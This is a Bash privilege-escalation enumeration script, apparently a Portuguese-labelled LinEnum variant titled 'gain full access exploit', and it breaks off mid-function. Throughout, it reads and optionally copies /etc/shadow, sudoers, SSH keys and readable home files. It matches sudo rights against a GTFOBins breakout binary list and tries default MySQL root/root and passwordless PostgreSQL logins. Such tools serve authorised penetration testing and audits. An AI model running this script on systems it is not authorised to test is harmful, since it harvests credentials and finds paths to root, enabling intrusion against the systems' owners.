gain full access exploit
#!/bin/bash
# Enumerates local information about a Linux target.
# useful binaries (thanks to https://gtfobins.github.io/)
# Kept as a plain word list and joined into the '\|'-separated basic-regex
# alternation that the `grep -w "$binarylist"` probes below expect.
_gtfobins=(
  aria2c arp ash awk base64 bash busybox cat chmod chown cp csh curl cut dash
  date dd diff dmsetup docker ed emacs env expand expect file find flock fmt
  fold ftp gawk gdb gimp git grep head ht iftop ionice 'ip$' irb jjs jq
  jrunscript ksh ld.so ldconfig less logsave lua make man mawk more mv mysql
  nano nawk nc netcat nice nl nmap node od openssl perl pg php pic pico python
  readelf rlwrap rpm rpmquery rsync ruby run-parts rvim scp script sed setarch
  sftp sh shuf socat sort sqlite3 'ssh$' start-stop-daemon stdbuf strace
  systemctl tail tar taskset tclsh tee telnet tftp time timeout ul unexpand
  uniq unshare vi vim watch wget wish xargs xxd zip zsh
)
# every entry followed by '\|', then the trailing separator stripped
binarylist=$(printf '%s\\|' "${_gtfobins[@]}")
binarylist=${binarylist%\\|}
unset _gtfobins
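#######################################
# Reports kernel build string, distribution release files and hostname.
# Globals:   none
# Arguments: none
# Outputs:   the section report on stdout; probe errors are discarded
# Returns:   0
#######################################
system_info() {
  local procver release hostnamed
  printf '%s\n' "Informações do sistema"
  # kernel build string. Report data is printed through printf '%s' rather
  # than echo -e, so backslash sequences inside command output are printed
  # verbatim instead of being re-interpreted.
  procver=$(cat /proc/version 2>/dev/null)
  if [[ -n "$procver" ]]; then
    printf '%s\n%s\n\n\n' "Informações do Kernel (continuação)" "$procver"
  fi
  # search all *-release files for version info (an unmatched glob is left
  # literal and cat's error is discarded, i.e. the section is skipped)
  release=$(cat /etc/*-release 2>/dev/null)
  if [[ -n "$release" ]]; then
    printf '%s\n%s\n\n\n' "Informações especificas de release" "$release"
  fi
  # target hostname info
  hostnamed=$(hostname 2>/dev/null)
  if [[ -n "$hostnamed" ]]; then
    printf '%s\n%s\n\n\n' "Hostname:" "$hostnamed"
  fi
}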
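#######################################
# Reports the user/group context: current identity, login history, group
# memberships, /etc/passwd and shadow-file readability, uid-0 accounts,
# sudo rules (unauthenticated and, when $sudopass is set, with
# $userpassword), home-directory permissions and — in thorough mode —
# writable, owned, hidden, world-readable and SSH-related files.
# With $export set, readable sensitive files are copied below $format.
# Globals:   export, format, thorough, sudopass, userpassword,
#            binarylist (all read)
# Arguments: none
# Outputs:   the section report on stdout; probe errors are discarded
# Returns:   0
#######################################
user_info() {
  local currusr lastlogedonusrs loggedonusrs grpinfo adm_users hashesinpasswd
  local readpasswd readshadow readmasterpasswd superman sudoers sudoperms
  local sudoauth sudopermscheck sudopwnage whohasbeensudo rthmdir homedirperms
  local grfilesall ourfilesall hiddenfiles wrfileshm homedircontents sshfiles
  local sshrootline sshrootlogin me
  printf '%s\n' "Usario/Grupo"
  # current user details. Report data is printed through printf '%s' rather
  # than echo -e, so backslash sequences inside command output are printed
  # verbatim instead of being re-interpreted.
  currusr=$(id 2>/dev/null)
  if [[ -n "$currusr" ]]; then
    printf '%s\n%s\n\n\n' "Informações atuais do usuario/grupo" "$currusr"
  fi
  # last logged on user information
  lastlogedonusrs=$(lastlog 2>/dev/null | grep -v "Never" 2>/dev/null)
  if [[ -n "$lastlogedonusrs" ]]; then
    printf '%s\n%s\n\n\n' "Usuario logado previamente no sistema" "$lastlogedonusrs"
  fi
  # who else is logged on
  loggedonusrs=$(w 2>/dev/null)
  if [[ -n "$loggedonusrs" ]]; then
    printf '%s\n%s\n\n\n' "Quem esta logado agora?" "$loggedonusrs"
  fi
  # lists all id's and respective group(s); the account name is read straight
  # from the first field of /etc/passwd instead of word-splitting a pipeline
  grpinfo=$(while IFS=: read -r user _ || [[ -n "$user" ]]; do id "$user"; done 2>/dev/null </etc/passwd)
  if [[ -n "$grpinfo" ]]; then
    printf '%s\n%s\n\n\n' "Associacoes de grupos" "$grpinfo"
  fi
  # added by phackt - look for adm group (thanks patrick)
  adm_users=$(printf '%s\n' "$grpinfo" | grep "(adm)")
  if [[ -n "$adm_users" ]]; then
    printf '%s\n%s\n\n\n' "Procurando algum usuario administrador" "$adm_users"
  fi
  # checks to see if any hashes are stored in /etc/passwd (deprecated *nix storage method)
  hashesinpasswd=$(grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null)
  if [[ -n "$hashesinpasswd" ]]; then
    printf '%s\n%s\n\n\n' "Procurando passwords hashes in /etc/passwd" "$hashesinpasswd"
  fi
  # contents of /etc/passwd
  readpasswd=$(cat /etc/passwd 2>/dev/null)
  if [[ -n "$readpasswd" ]]; then
    printf '%s\n%s\n\n\n' "Conteudo de /etc/passwd" "$readpasswd"
  fi
  # export copies: $format is quoted and required to be non-empty so an unset
  # export directory can never resolve to "/"; mkdir -p also creates missing
  # parents instead of failing silently
  if [[ -n "$export" && -n "$format" && -n "$readpasswd" ]]; then
    mkdir -p -- "$format/etc-export/" 2>/dev/null
    cp -- /etc/passwd "$format/etc-export/passwd" 2>/dev/null
  fi
  # checks to see if the shadow file can be read
  readshadow=$(cat /etc/shadow 2>/dev/null)
  if [[ -n "$readshadow" ]]; then
    printf '%s\n%s\n\n\n' "Podemos ler /etc/shadow?" "$readshadow"
  fi
  if [[ -n "$export" && -n "$format" && -n "$readshadow" ]]; then
    mkdir -p -- "$format/etc-export/" 2>/dev/null
    cp -- /etc/shadow "$format/etc-export/shadow" 2>/dev/null
  fi
  # checks to see if /etc/master.passwd can be read - BSD 'shadow' variant
  readmasterpasswd=$(cat /etc/master.passwd 2>/dev/null)
  if [[ -n "$readmasterpasswd" ]]; then
    printf '%s\n%s\n\n\n' "Podemos ler /etc/master.passwd?" "$readmasterpasswd"
  fi
  if [[ -n "$export" && -n "$format" && -n "$readmasterpasswd" ]]; then
    mkdir -p -- "$format/etc-export/" 2>/dev/null
    cp -- /etc/master.passwd "$format/etc-export/master.passwd" 2>/dev/null
  fi
  # all root accounts (uid 0), comment lines skipped
  superman=$(awk -F: '!/^#/ && $3 == 0 { print $1 }' /etc/passwd 2>/dev/null)
  if [[ -n "$superman" ]]; then
    printf '%s\n%s\n\n\n' "Root accounts" "$superman"
  fi
  # pull out vital sudoers info: blank lines and lines containing '#' dropped
  sudoers=$(grep -v -e '^$' -e '#' /etc/sudoers 2>/dev/null)
  if [[ -n "$sudoers" ]]; then
    # the heading used to run straight into the first rule (missing newline)
    printf '%s\n%s\n\n\n' "Configuraco sudoer (condensada)" "$sudoers"
  fi
  if [[ -n "$export" && -n "$format" && -n "$sudoers" ]]; then
    mkdir -p -- "$format/etc-export/" 2>/dev/null
    cp -- /etc/sudoers "$format/etc-export/sudoers" 2>/dev/null
  fi
  # can we sudo without supplying a password (an empty line is fed to -S)
  sudoperms=$(sudo -S -l -k 2>/dev/null <<<'')
  if [[ -n "$sudoperms" ]]; then
    printf '%s\n%s\n\n\n' "Temos sudo com fornecimento de senha" "$sudoperms"
  fi
  # check sudo perms - authenticated; only attempted when a password was
  # supplied and the unauthenticated check above returned nothing
  if [[ -n "$sudopass" && -z "$sudoperms" ]]; then
    # the password is piped quoted, so it is neither word-split nor globbed
    sudoauth=$(printf '%s\n' "$userpassword" | sudo -S -l -k 2>/dev/null)
    if [[ -n "$sudoauth" ]]; then
      printf '%s\n%s\n\n\n' "Temos sudo se fornecido senha?" "$sudoauth"
    fi
    ## known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values) - authenticated
    # derived from the sudo -l output already captured, so the password is not
    # presented to sudo a second time
    sudopermscheck=$(printf '%s\n' "$sudoauth" | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w "$binarylist" 2>/dev/null)
    if [[ -n "$sudopermscheck" ]]; then
      printf '%s\n%s\n\n\n' "Possivel sudo ownado" "$sudopermscheck"
    fi
  fi
  # known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values)
  # same derivation, from the unauthenticated sudo -l output captured above
  sudopwnage=$(printf '%s\n' "$sudoperms" | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w "$binarylist" 2>/dev/null)
  if [[ -n "$sudopwnage" ]]; then
    printf '%s\n%s\n\n\n' "Possivel sudo ownado" "$sudopwnage"
  fi
  # who has sudoed in the past
  whohasbeensudo=$(find /home -name .sudo_as_admin_successful 2>/dev/null)
  if [[ -n "$whohasbeensudo" ]]; then
    printf '%s\n%s\n\n\n' "Contas de sudo ownadas" "$whohasbeensudo"
  fi
  # checks to see if roots home directory is accessible
  rthmdir=$(ls -ahl /root/ 2>/dev/null)
  if [[ -n "$rthmdir" ]]; then
    printf '%s\n%s\n\n\n' "Podemos ler arquivos de root?" "$rthmdir"
  fi
  # displays /home directory permissions - check if any are lax
  homedirperms=$(ls -ahl /home/ 2>/dev/null)
  if [[ -n "$homedirperms" ]]; then
    printf '%s\n%s\n\n\n' "Temos permissoes de ler /home?" "$homedirperms"
  fi
  # the remaining checks walk large parts of the filesystem and only run with
  # the thorough switch; one guard replaces the per-check repetition
  if [[ "$thorough" == "1" ]]; then
    me=$(whoami 2>/dev/null)
    # looks for files we can write to that don't belong to us
    grfilesall=$(find / -writable ! -user "$me" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null)
    if [[ -n "$grfilesall" ]]; then
      printf '%s\n%s\n\n\n' "Arquivos nao pertencentes ao usuario mas com permissao de leitura pelo grupo" "$grfilesall"
    fi
    # looks for files that belong to us
    ourfilesall=$(find / -user "$me" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null)
    if [[ -n "$ourfilesall" ]]; then
      printf '%s\n%s\n\n\n' "Arquivos pertencentes ao nosso usuario" "$ourfilesall"
    fi
    # looks for hidden files
    hiddenfiles=$(find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null)
    if [[ -n "$hiddenfiles" ]]; then
      printf '%s\n%s\n\n\n' "Arquivos ocultos" "$hiddenfiles"
    fi
    # looks for world-readable files within /home
    wrfileshm=$(find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null)
    if [[ -n "$wrfileshm" ]]; then
      printf '%s\n%s\n\n\n' "Arquivos de leitura em /home" "$wrfileshm"
    fi
    if [[ -n "$export" && -n "$format" && -n "$wrfileshm" ]]; then
      mkdir -p -- "$format/wr-files/" 2>/dev/null
      # the path is the last field of each `ls -al` line (a " -> target"
      # suffix is dropped first); names containing whitespace are still not
      # handled — same limitation as the previous word-splitting loop
      printf '%s\n' "$wrfileshm" | awk '{ sub(/ -> .*$/, ""); print $NF }' | while IFS= read -r f; do
        cp --parents -- "$f" "$format/wr-files/"
      done 2>/dev/null
    fi
    # lists current user's home directory contents
    homedircontents=$(ls -ahl ~ 2>/dev/null)
    if [[ -n "$homedircontents" ]]; then
      printf '%s\n%s\n\n\n' "Conteudo do diretorio /home" "$homedircontents"
    fi
    # checks for if various ssh files are accessible
    sshfiles=$(find / \( -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \; 2>/dev/null)
    if [[ -n "$sshfiles" ]]; then
      printf '%s\n%s\n\n\n' "SSH KEYs" "$sshfiles"
    fi
    if [[ -n "$export" && -n "$format" && -n "$sshfiles" ]]; then
      mkdir -p -- "$format/ssh-files/" 2>/dev/null
      printf '%s\n' "$sshfiles" | awk '{ sub(/ -> .*$/, ""); print $NF }' | while IFS= read -r f; do
        cp --parents -- "$f" "$format/ssh-files/"
      done 2>/dev/null
    fi
  fi
  # is root permitted to login via ssh; the matching line is captured once and
  # reused for the report instead of grepping the file a second time
  sshrootline=$(grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#")
  sshrootlogin=$(printf '%s\n' "$sshrootline" | awk '{print $2}')
  if [[ "$sshrootlogin" == "yes" ]]; then
    printf '%s\n%s\n\n\n' "Permissao de login no root via SSH" "$sshrootline"
  fi
}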
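#######################################
# Reports the process environment: variables, SELinux status, PATH and the
# permissions of each PATH entry, available shells, umask and the password
# policy lines of /etc/login.defs (copied below $format when $export is set).
# Globals:   export, format, PATH (read)
# Arguments: none
# Outputs:   the section report on stdout; probe errors are discarded
# Returns:   0
#######################################
environmental_info() {
  local envinfo sestatus pathinfo pathswriteable shellinfo umaskvalue umaskdef logindefs
  local -a pathdirs=()
  printf '%s\n' "MEIO AMBIENTE"
  # env information (LS_COLORS filtered out). Report data is printed through
  # printf '%s' rather than echo -e, so backslash sequences inside command
  # output are printed verbatim instead of being re-interpreted.
  envinfo=$(env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null)
  if [[ -n "$envinfo" ]]; then
    printf '%s\n%s\n\n\n' "Informacoes do meio ambiente" "$envinfo"
  fi
  # check if selinux is enabled
  sestatus=$(sestatus 2>/dev/null)
  if [[ -n "$sestatus" ]]; then
    printf '%s\n%s\n\n\n' "Checando se o selinux esta presente" "$sestatus"
  fi
  # phackt
  # current path configuration
  pathinfo=${PATH-}
  if [[ -n "$pathinfo" ]]; then
    # one ls(1) argument per PATH entry, so entries are neither word-split
    # nor globbed; errors for missing entries are discarded like every other
    # probe in this script
    IFS=: read -r -a pathdirs <<<"$pathinfo"
    pathswriteable=$(ls -ld "${pathdirs[@]}" 2>/dev/null)
    printf '%s\n%s\n%s\n\n\n' "Informacoes de path" "$pathinfo" "$pathswriteable"
  fi
  # lists available shells
  shellinfo=$(cat /etc/shells 2>/dev/null)
  if [[ -n "$shellinfo" ]]; then
    printf '%s\n%s\n\n\n' "Possiveis shells" "$shellinfo"
  fi
  # current umask value with both symbolic and octal output; the two calls are
  # sequenced with ';' — the previous '&' put the first one in the background
  # and left the order of the captured output to chance
  umaskvalue=$(umask -S 2>/dev/null; umask 2>/dev/null)
  if [[ -n "$umaskvalue" ]]; then
    printf '%s\n%s\n\n\n' "Valor da umask atual" "$umaskvalue"
  fi
  # umask value as in /etc/login.defs
  umaskdef=$(grep -i "^UMASK" /etc/login.defs 2>/dev/null)
  if [[ -n "$umaskdef" ]]; then
    printf '%s\n%s\n\n\n' "Valor especifico do umask in /etc/login.defs" "$umaskdef"
  fi
  # password policy information as stored in /etc/login.defs
  logindefs=$(grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null)
  if [[ -n "$logindefs" ]]; then
    printf '%s\n%s\n\n\n' "Passwords e informacoes armazenadas" "$logindefs"
  fi
  # $format quoted and required non-empty so the copy never lands under "/"
  if [[ -n "$export" && -n "$format" && -n "$logindefs" ]]; then
    mkdir -p -- "$format/etc-export/" 2>/dev/null
    cp -- /etc/login.defs "$format/etc-export/login.defs" 2>/dev/null
  fi
}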
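#######################################
# Reports scheduled jobs: /etc/cron* listing and world-writable entries,
# /etc/crontab, per-user crontabs, anacron and systemd timers.
# Globals:   thorough (read)
# Arguments: none
# Outputs:   the section report on stdout; probe errors are discarded
# Returns:   0
#######################################
job_info() {
  local cronjobs cronjobwwperms crontabvalue crontabvar anacronjobs anacrontab
  local cronother systemdtimers info
  printf '%s\n' "Trabalhos e tarefas"
  # are there any cron jobs configured. Report data is printed through
  # printf '%s' rather than echo -e, so backslash sequences inside command
  # output are printed verbatim instead of being re-interpreted.
  cronjobs=$(ls -la /etc/cron* 2>/dev/null)
  if [[ -n "$cronjobs" ]]; then
    printf '%s\n%s\n\n\n' "Cron" "$cronjobs"
  fi
  # can we manipulate these jobs in any way (world-writable cron files, listed and dumped)
  cronjobwwperms=$(find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} \; 2>/dev/null)
  if [[ -n "$cronjobwwperms" ]]; then
    printf '%s\n%s\n\n\n' "Cron jobs" "$cronjobwwperms"
  fi
  # crontab contents
  crontabvalue=$(cat /etc/crontab 2>/dev/null)
  if [[ -n "$crontabvalue" ]]; then
    printf '%s\n%s\n\n\n' "Conteudo de crontab" "$crontabvalue"
  fi
  crontabvar=$(ls -la /var/spool/cron/crontabs 2>/dev/null)
  if [[ -n "$crontabvar" ]]; then
    printf '%s\n%s\n\n\n' "Qualquer coisa interessante in /var/spool/cron/crontabs:" "$crontabvar"
  fi
  anacronjobs=$(ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null)
  if [[ -n "$anacronjobs" ]]; then
    printf '%s\n%s\n\n\n' "Trabalhos do Anacron e permissões de arquivo associadas" "$anacronjobs"
  fi
  anacrontab=$(ls -la /var/spool/anacron 2>/dev/null)
  if [[ -n "$anacrontab" ]]; then
    printf '%s\n%s\n\n\n' "Quando os trabalhos foram executados pela última vez (conteúdo de /var/spool/anacron):" "$anacrontab"
  fi
  # pull out account names from /etc/passwd and see if any users have associated
  # cronjobs (priv command); cut's own errors are now discarded too
  cronother=$(cut -d ":" -f 1 /etc/passwd 2>/dev/null | xargs -n1 crontab -l -u 2>/dev/null)
  if [[ -n "$cronother" ]]; then
    printf '%s\n%s\n\n\n' "Trabalhos de todos os usuarios" "$cronother"
  fi
  # list systemd timers
  if [[ "$thorough" == "1" ]]; then
    # include inactive timers in thorough mode
    systemdtimers=$(systemctl list-timers --all 2>/dev/null)
    info=""
  else
    # drop the last line of the listing (head -n -1 is a GNU extension)
    systemdtimers=$(systemctl list-timers 2>/dev/null | head -n -1 2>/dev/null)
    # replace the info in the output with a hint towards thorough mode
    info="Temporizadores inativos"
  fi
  if [[ -n "$systemdtimers" ]]; then
    printf '%s\n%s\n%s\n\n\n' "Systemd timers" "$systemdtimers" "$info"
  fi
}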
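#######################################
# Reports network configuration: interfaces, ARP cache, nameservers,
# default route and listening TCP/UDP sockets. For each item the net-tools
# command is tried first and the ip/ss variant is shown only when it
# produced nothing.
# Globals:   none
# Arguments: none
# Outputs:   the section report on stdout; probe errors are discarded
# Returns:   0
#######################################
networking_info() {
  local nicinfo nicinfoip arpinfo arpinfoip nsinfo nsinfosysd defroute defrouteip
  local tcpservs tcpservsip udpservs udpservsip
  printf '%s\n' "NETWORK"
  # nic information. Report data is printed through printf '%s' rather than
  # echo -e, so backslash sequences inside command output are printed
  # verbatim instead of being re-interpreted.
  nicinfo=$(/sbin/ifconfig -a 2>/dev/null)
  if [[ -n "$nicinfo" ]]; then
    printf '%s\n%s\n\n\n' "Network IP info" "$nicinfo"
  fi
  # nic information (using ip)
  nicinfoip=$(/sbin/ip a 2>/dev/null)
  if [[ -z "$nicinfo" && -n "$nicinfoip" ]]; then
    printf '%s\n%s\n\n\n' "IP info" "$nicinfoip"
  fi
  arpinfo=$(arp -a 2>/dev/null)
  if [[ -n "$arpinfo" ]]; then
    printf '%s\n%s\n\n\n' "ARP History" "$arpinfo"
  fi
  arpinfoip=$(ip n 2>/dev/null)
  if [[ -z "$arpinfo" && -n "$arpinfoip" ]]; then
    printf '%s\n%s\n\n\n' "ARP History" "$arpinfoip"
  fi
  # dns settings
  nsinfo=$(grep "nameserver" /etc/resolv.conf 2>/dev/null)
  if [[ -n "$nsinfo" ]]; then
    printf '%s\n%s\n\n\n' "Nameserver" "$nsinfo"
  fi
  nsinfosysd=$(systemd-resolve --status 2>/dev/null)
  if [[ -n "$nsinfosysd" ]]; then
    printf '%s\n%s\n\n\n' "Nameserver" "$nsinfosysd"
  fi
  # default route configuration
  defroute=$(route 2>/dev/null | grep default)
  if [[ -n "$defroute" ]]; then
    printf '%s\n%s\n\n\n' "Rota padrao" "$defroute"
  fi
  # default route configuration (using ip)
  defrouteip=$(ip r 2>/dev/null | grep default)
  if [[ -z "$defroute" && -n "$defrouteip" ]]; then
    printf '%s\n%s\n\n\n' "Rota padrao" "$defrouteip"
  fi
  # listening TCP
  tcpservs=$(netstat -ntpl 2>/dev/null)
  if [[ -n "$tcpservs" ]]; then
    printf '%s\n%s\n\n\n' "Ouvindo TCP" "$tcpservs"
  fi
  tcpservsip=$(ss -t -l -n 2>/dev/null)
  if [[ -z "$tcpservs" && -n "$tcpservsip" ]]; then
    printf '%s\n%s\n\n\n' "Ouvindo TCP" "$tcpservsip"
  fi
  # listening UDP
  udpservs=$(netstat -nupl 2>/dev/null)
  if [[ -n "$udpservs" ]]; then
    printf '%s\n%s\n\n\n' "Ouvindo UDP" "$udpservs"
  fi
  udpservsip=$(ss -u -l -n 2>/dev/null)
  if [[ -z "$udpservs" && -n "$udpservsip" ]]; then
    printf '%s\n%s\n\n\n' "Ouvindo UDP" "$udpservsip"
  fi
}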
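#######################################
# Reports running processes and their binaries' permissions, inetd/xinetd
# configuration, and init.d/rc.d/upstart/systemd unit files — in particular
# files under those directories not owned by uid 0. With $export set,
# inetd/xinetd configuration and process binaries are copied below $format.
# Globals:   export, format (read)
# Arguments: none
# Outputs:   the section report on stdout; probe errors are discarded
# Returns:   0
#######################################
services_info() {
  local psaux procperm procpermbase inetdread inetdbinperms xinetdread xinetdincd
  local xinetdbinperms initdread initdperms rcdread rcdperms usrrcdread usrrcdperms
  local initread initperms systemdread systemdperms
  printf '%s\n' "SERVICOS"
  # running processes. Report data is printed through printf '%s' rather than
  # echo -e, so backslash sequences inside command output are printed
  # verbatim instead of being re-interpreted.
  psaux=$(ps aux 2>/dev/null)
  if [[ -n "$psaux" ]]; then
    printf '%s\n%s\n\n\n' "Processos em execucao" "$psaux"
  fi
  # lookup process binary path and permissions (the trailing awk drops duplicate lines)
  procperm=$(ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++' 2>/dev/null)
  if [[ -n "$procperm" ]]; then
    printf '%s\n%s\n\n\n' "Binarios e processos em execucao" "$procperm"
  fi
  # export copies: $format is quoted and required non-empty so an unset export
  # directory can never resolve to "/"; mkdir -p also creates missing parents
  if [[ -n "$export" && -n "$format" && -n "$procperm" ]]; then
    procpermbase=$(ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls 2>/dev/null | awk '!x[$0]++' 2>/dev/null)
    mkdir -p -- "$format/ps-export/" 2>/dev/null
    # one path per line from plain ls; read line-wise instead of word-splitting
    printf '%s\n' "$procpermbase" | while IFS= read -r f; do
      cp --parents -- "$f" "$format/ps-export/"
    done 2>/dev/null
  fi
  # anything 'useful' in inetd.conf
  inetdread=$(cat /etc/inetd.conf 2>/dev/null)
  if [[ -n "$inetdread" ]]; then
    printf '%s\n%s\n\n\n' "Conteudo de /etc/inetd.conf:" "$inetdread"
  fi
  if [[ -n "$export" && -n "$format" && -n "$inetdread" ]]; then
    mkdir -p -- "$format/etc-export/" 2>/dev/null
    cp -- /etc/inetd.conf "$format/etc-export/inetd.conf" 2>/dev/null
  fi
  # very 'rough' command to extract associated binaries from inetd.conf & show permissions of each
  inetdbinperms=$(awk '{print $7}' /etc/inetd.conf 2>/dev/null | xargs -r ls -la 2>/dev/null)
  if [[ -n "$inetdbinperms" ]]; then
    printf '%s\n%s\n\n\n' "Permissoes dos binarios" "$inetdbinperms"
  fi
  xinetdread=$(cat /etc/xinetd.conf 2>/dev/null)
  if [[ -n "$xinetdread" ]]; then
    printf '%s\n%s\n\n\n' "Conteudo de /etc/xinetd.conf:" "$xinetdread"
  fi
  if [[ -n "$export" && -n "$format" && -n "$xinetdread" ]]; then
    mkdir -p -- "$format/etc-export/" 2>/dev/null
    cp -- /etc/xinetd.conf "$format/etc-export/xinetd.conf" 2>/dev/null
  fi
  # the xinetd.d include directory is listed directly when xinetd.conf references it
  xinetdincd=$(grep "/etc/xinetd.d" /etc/xinetd.conf 2>/dev/null)
  if [[ -n "$xinetdincd" ]]; then
    printf '%s\n' "Permissoes dos binarios associados:"
    ls -la /etc/xinetd.d 2>/dev/null
    printf '\n\n'
  fi
  # very 'rough' command to extract associated binaries from xinetd.conf & show permissions of each
  xinetdbinperms=$(awk '{print $7}' /etc/xinetd.conf 2>/dev/null | xargs -r ls -la 2>/dev/null)
  if [[ -n "$xinetdbinperms" ]]; then
    # heading no longer carries the stray leading backslash echo -e used to print
    printf '%s\n%s\n\n\n' "Permissoes dos binarios xinetd:" "$xinetdbinperms"
  fi
  initdread=$(ls -la /etc/init.d 2>/dev/null)
  if [[ -n "$initdread" ]]; then
    printf '%s\n%s\n\n\n' "/etc/init.d/ Permissoes dos binarios:" "$initdread"
  fi
  # init.d files NOT belonging to root!
  initdperms=$(find /etc/init.d/ ! -uid 0 -type f 2>/dev/null | xargs -r ls -la 2>/dev/null)
  if [[ -n "$initdperms" ]]; then
    printf '%s\n%s\n\n\n' "/etc/init.d/ Arquivos abaixo de root" "$initdperms"
  fi
  rcdread=$(ls -la /etc/rc.d/init.d 2>/dev/null)
  if [[ -n "$rcdread" ]]; then
    printf '%s\n%s\n\n\n' "/etc/rc.d/init.d Permissoes de binarios" "$rcdread"
  fi
  # rc.d init files NOT belonging to root!
  rcdperms=$(find /etc/rc.d/init.d ! -uid 0 -type f 2>/dev/null | xargs -r ls -la 2>/dev/null)
  if [[ -n "$rcdperms" ]]; then
    printf '%s\n%s\n\n\n' "/etc/rc.d/init.d Binarios fora do root" "$rcdperms"
  fi
  usrrcdread=$(ls -la /usr/local/etc/rc.d 2>/dev/null)
  if [[ -n "$usrrcdread" ]]; then
    printf '%s\n%s\n\n\n' "/usr/local/etc/rc.d Permissoes de binarios" "$usrrcdread"
  fi
  # rc.d files NOT belonging to root!
  usrrcdperms=$(find /usr/local/etc/rc.d ! -uid 0 -type f 2>/dev/null | xargs -r ls -la 2>/dev/null)
  if [[ -n "$usrrcdperms" ]]; then
    printf '%s\n%s\n\n\n' "/usr/local/etc/rc.d Arquivos nao pertencentes a root" "$usrrcdperms"
  fi
  initread=$(ls -la /etc/init/ 2>/dev/null)
  if [[ -n "$initread" ]]; then
    printf '%s\n%s\n\n\n' "/etc/init/ Permissoes dos arquivos de configuracao" "$initread"
  fi
  # upstart scripts not belonging to root
  initperms=$(find /etc/init ! -uid 0 -type f 2>/dev/null | xargs -r ls -la 2>/dev/null)
  if [[ -n "$initperms" ]]; then
    printf '%s\n%s\n\n\n' "/etc/init/ Arquivos de configuracoes nao pertencentes ao root" "$initperms"
  fi
  systemdread=$(ls -lthR /lib/systemd/ 2>/dev/null)
  if [[ -n "$systemdread" ]]; then
    printf '%s\n%s\n\n\n' "/lib/systemd/* Permissoes nos arquivos de configuracao" "$systemdread"
  fi
  # systemd files not belonging to root
  systemdperms=$(find /lib/systemd/ ! -uid 0 -type f 2>/dev/null | xargs -r ls -la 2>/dev/null)
  if [[ -n "$systemdperms" ]]; then
    printf '%s\n%s\n\n\n' "/lib/systemd/* Arquivos de configuracao nao pertecentes ao root" "$systemdperms"
  fi
}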
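#######################################
# Reports installed software of interest: sudo, MySQL and PostgreSQL
# versions and whether their default accounts accept a connection, Apache
# version/user/modules, .htpasswd files and (thorough mode) the contents of
# common web roots. The Apache envvars file is copied below $format when
# $export is set.
# Globals:   export, format, thorough (read)
# Arguments: none
# Outputs:   the section report on stdout; probe errors are discarded
# Returns:   0
#######################################
software_configs() {
  local sudover mysqlver mysqlconnect mysqlconnectnopass postgver postcon1 postcon11
  local postcon2 postcon22 apachever apacheusr apachemodules htpasswd apachehomedirs
  printf '%s\n' "SOFTWARE"
  # sudo version - check to see if there are any known vulnerabilities with
  # this. Report data is printed through printf '%s' rather than echo -e, so
  # backslash sequences inside command output are printed verbatim.
  sudover=$(sudo -V 2>/dev/null | grep "Sudo version" 2>/dev/null)
  if [[ -n "$sudover" ]]; then
    printf '%s\n%s\n\n\n' "Versao do sudo" "$sudover"
  fi
  # mysql details - if installed
  mysqlver=$(mysql --version 2>/dev/null)
  if [[ -n "$mysqlver" ]]; then
    printf '%s\n%s\n\n\n' "Versao do MySQL" "$mysqlver"
  fi
  # checks to see if root/root will get us a connection (the password is
  # passed on argv here, as in the original probe)
  mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
  if [[ -n "$mysqlconnect" ]]; then
    printf '%s\n%s\n\n\n' "Checando se existe conexao default no MYSQL" "$mysqlconnect"
  fi
  # root with no password
  mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
  if [[ -n "$mysqlconnectnopass" ]]; then
    printf '%s\n%s\n\n\n' "Conectando no MySQL com user root e sem password" "$mysqlconnectnopass"
  fi
  # postgres details - if installed
  postgver=$(psql -V 2>/dev/null)
  if [[ -n "$postgver" ]]; then
    printf '%s\n%s\n\n\n' "Versao postgree" "$postgver"
  fi
  # checks to see if any postgres password exists and connects to DB 'template0'
  # - following commands are a variant on this (-w never prompts)
  postcon1=$(psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version)
  if [[ -n "$postcon1" ]]; then
    printf '%s\n%s\n\n\n' "Podemos nos conectar no postgree com usuario postgree e sem senha" "$postcon1"
  fi
  postcon11=$(psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version)
  if [[ -n "$postcon11" ]]; then
    printf '%s\n%s\n\n\n' "Sem conexao ao postgree com usuario e sem senha" "$postcon11"
  fi
  postcon2=$(psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version)
  if [[ -n "$postcon2" ]]; then
    printf '%s\n%s\n\n\n' "Conectando em postgree com user psql sem senha" "$postcon2"
  fi
  postcon22=$(psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version)
  if [[ -n "$postcon22" ]]; then
    printf '%s\n%s\n\n\n' "Sem conexao ao psql" "$postcon22"
  fi
  # apache details - if installed (Debian and RedHat binary names)
  apachever=$(apache2 -v 2>/dev/null; httpd -v 2>/dev/null)
  if [[ -n "$apachever" ]]; then
    printf '%s\n%s\n\n\n' "Versao do apache" "$apachever"
  fi
  # what account is apache running under
  apacheusr=$(grep -i 'user\|group' /etc/apache2/envvars 2>/dev/null | awk '{sub(/.*\export /,"")}1' 2>/dev/null)
  if [[ -n "$apacheusr" ]]; then
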